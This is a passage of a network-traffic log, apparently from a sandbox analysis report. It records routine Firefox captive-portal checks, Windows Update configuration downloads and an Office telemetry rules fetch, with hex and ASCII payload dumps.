Nov 5, 2024 18:47:08.401732922 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 5, 2024 18:47:08.526452065 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 21:54:06 GMT Age: 71582 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 5, 2024 18:47:11.737633944 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 5, 2024 18:47:11.862564087 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 21:54:06 GMT Age: 71585 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	60540	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:06.474045038 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	60543	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:06.985016108 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	60551	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:07.302041054 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	60554	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:07.909466982 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 5, 2024 18:47:08.497294903 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 05 Nov 2024 00:16:26 GMT Age: 63042 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 5, 2024 18:47:08.529270887 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 5, 2024 18:47:08.651880026 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 05 Nov 2024 00:16:26 GMT Age: 63042 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 5, 2024 18:47:11.880182028 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 5, 2024 18:47:12.003092051 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 05 Nov 2024 00:16:26 GMT Age: 63045 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:12 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fgmCF13FEfPZ7KT&MD=glmp5CVV HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-05 17:45:13 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: ef06b679-028a-4c10-85a9-6434fd09f00f MS-RequestId: bdf9f921-707a-4c30-b52c-2dfbf76b6f01 MS-CV: X5JF6b0oBk+gZYoE.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 05 Nov 2024 17:45:12 GMT Connection: close Content-Length: 24490
2024-11-05 17:45:13 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-05 17:45:13 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:51 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fgmCF13FEfPZ7KT&MD=glmp5CVV HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-05 17:45:51 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: f7d74829-c4c1-4af8-9fcb-9a509ab78d61 MS-RequestId: cc5a6bca-b399-45b2-a098-8a91ec33d269 MS-CV: q4DJdetxbU6+gTw4.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 05 Nov 2024 17:45:51 GMT Connection: close Content-Length: 30005
2024-11-05 17:45:51 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-05 17:45:51 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49737	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:54 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:54 UTC	471	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:54 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Mon, 04 Nov 2024 13:15:36 GMT ETag: "0x8DCFCD2C536D948" x-ms-request-id: c2d5b439-501e-0047-45e8-2ece6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174554Z-17df447cdb54ntx4hC1DFW2k4000000001gg00000000rkhg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:54 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-05 17:45:54 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-05 17:45:54 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-05 17:45:54 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-05 17:45:54 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-05 17:45:54 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-05 17:45:54 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-05 17:45:55 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-05 17:45:55 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-05 17:45:55 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 